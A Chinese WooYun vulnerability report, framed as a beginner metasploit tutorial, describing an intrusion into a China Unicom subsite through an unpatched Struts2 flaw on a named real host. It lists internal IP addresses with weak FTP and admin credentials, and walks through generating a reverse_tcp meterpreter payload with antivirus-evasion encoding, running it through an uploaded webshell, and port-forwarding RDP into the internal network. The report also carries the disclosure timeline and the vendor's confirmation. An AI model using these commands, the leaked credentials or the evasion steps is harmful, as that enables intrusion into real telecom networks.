当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135828

漏洞标题:运营商安全之中国联通某分站漏洞未修复依旧可内网探测(metasploit基础教程篇)

相关厂商:中国联通

漏洞作者: 路人甲

提交时间:2015-08-23 12:33

修复时间:2015-10-10 08:42

公开时间:2015-10-10 08:42

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-23: 细节已通知厂商并且等待厂商处理中
2015-08-26: 厂商已经确认,细节仅向厂商公开
2015-09-05: 细节向核心白帽子及相关领域专家公开
2015-09-15: 细节向普通白帽子公开
2015-09-25: 细节向实习白帽子公开
2015-10-10: 细节向公众公开

简要描述:

崇拜肉爷

详细说明:

在肉肉提交的漏洞中
http://wooyun.org/bugs/wooyun-2015-0124160
提到了那个app,我也下载了,反编译一下,下面的网站依旧没有修复struts2漏洞

http://ttluniappserver.unicomlabs.com:8088/ServerCU/clientUpdate!askUpgrade.unicom


shell.png


得到shell,习惯性在里面翻了一下,看到了这个,hscan,看来已经被翻过好几次了

hscan.png


下载了report文件,看到也没有扫出来什么内容最多就是ftp弱口令三个

10.1.80.41 ftp/ftp@ftp.net
10.1.80.5 admin/123456
10.1.17.252 admin/admin


之后想着看能不能用metasploit获取meterpreter,然后就有了下面的内容。我也是小白,内容很基础,寻找了很久才从老外的视频中找到,我也是笨吧。
#1 准备工作
首先你需要设置路由器,在路由器端口转发处,加上kali系统的ip,将5566(映射到虚拟机中)

路由器设置.png


重启路由器,大功告成一部分了
#2 生成payload,与metasploit创建通道连接

msfpayload windows/meterpreter/reverse_tcp LHOST=你的ip(百度搜索ip出现的那个就是) LPORT=5566(任意,只要没冲突) x>/root/Desktop/11.exe
下面的是进行免杀编码的,我刚开始上传的都被杀掉了
msfpayload windows/meterpreter/reverse_tcp LHOST=你的ip LPORT=5566(同上) R | msfencode -e x86/shikata_ga_nai -c 1 -t exe -x /root/Desktop/11.exe -o /root/Desktop/12.exe


上传12.exe到c:/12.exe(我自己图方便)
下面进行设置

msf1.png


在上传的jspspy的命令执行中,输入生成12.exe的路径如:c:/12.exe,执行完运气好就可以获取连接

meter.png


之后就可以进行内网渗透了
使用portfwd add -l 6666 -p 3389 -r 127.0.0.1
可以直接转发,进行远程登录
终端下执行 rdesktop 127.0.0.1:6666就可以了

漏洞证明:

远程登陆.png

修复方案:

更新中间件

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-26 08:41

厂商回复:

CNVD确认并复现所述情况(第一层风险点),已经转由CNCERT向中国联通集团公司通报,由其后续协调网站管理单位处置.按内网风险评分,rank 20

最新状态:

暂无